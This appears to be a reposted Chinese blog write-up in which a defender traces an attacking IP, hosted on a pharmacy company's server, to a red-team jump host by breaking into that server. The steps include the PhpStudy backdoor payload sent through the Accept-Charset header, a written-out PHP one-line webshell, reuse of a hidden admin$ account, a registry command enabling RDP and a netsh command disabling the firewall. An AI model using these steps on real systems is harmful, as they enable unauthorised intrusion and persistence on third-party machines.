防守方溯源红队跳板

admin

101411
文章

87
评论

2022年12月6日13:50:36评论86 views字数 1021阅读3分24秒阅读模式

通过监测设备发现一个攻击IP，其资产为某药房企业，疑似为红队跳板，经过溯源，最终确定为该IP为红队跳板，感觉本次溯源有不少收获，且很有意思，因此将溯源过程记录下来。

1.首先访问其官网，发现服务器返回信息显示其使用了PHP/5.4.45，想到如果是利用PhpStudy工具，可能存在后门漏洞

2.查看之前的博客《PhpStudy后门漏洞》，构造payload,将Accept-Charset字段修改为base64加密的命令“phpinfo();”

3.根据结果看出确实存在PhpStudy解析漏洞，根据路径猜测其为Windows操作系统，执行base64加密的命令“echo system("net user");”

4.探测网站根目录，执行base64加密的命令“echo system("dir");”

5.下载安装PhpStudy工具，发现网站根目录都为www目录，猜测目标根目录为“D:phpStudyWWW”，创建文件写入一句话木马，base64加密“$fp=fopen('D:phpStudyWWWindex2.php',"w+");fputs($fp,'<?php eval($_POST['index2']);?>');fclose($fp);”

6.用工具进行连接马文件

7.探测开放端口信息，未开启3389端口

8.创建隐藏用户admin$发现已经被创建，可通过修改密码，开启3389端口，远程登录

PS：动作太大，不推荐，创建新用户后，远程连接新账号返回“远程登录时出现windows不能让您远程登录，因为不能加载您的配置文件”，才使用这种方法

开启3389端口：

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭防火墙（操作系统版本从PHPinfo截图可知为Windows Server 2003）：

netsh firewall set opmode mode=disable

9.远程连接，确定为红队攻击跳板

————————————————

原文链接：https://blog.csdn.net/qq_36197704/article/details/116941571

注：如有侵权请联系删除

学习更多技术，关注我：

觉得文章不错给点个‘再看’吧。

原文始发于微信公众号（编码安全研究）：防守方溯源红队跳板

左青龙
微信扫一扫

右白虎
微信扫一扫

防守方溯源红队跳板

HW红队常用命令速查大全

阿里云无法绕过的某地市级红队攻防

2024HW攻防演练之资产收敛

实战 | 浅谈省护红队的经历

钓鱼邮件如何确定office附件宏的打开者身份？| 总第241周

自动化溯源思考实践

浅谈一次省护红队的经历

简记一次HVV免杀题

从信息泄漏到Getshell-攻防演练

某地级攻防总结

发表评论

在线咨询

微信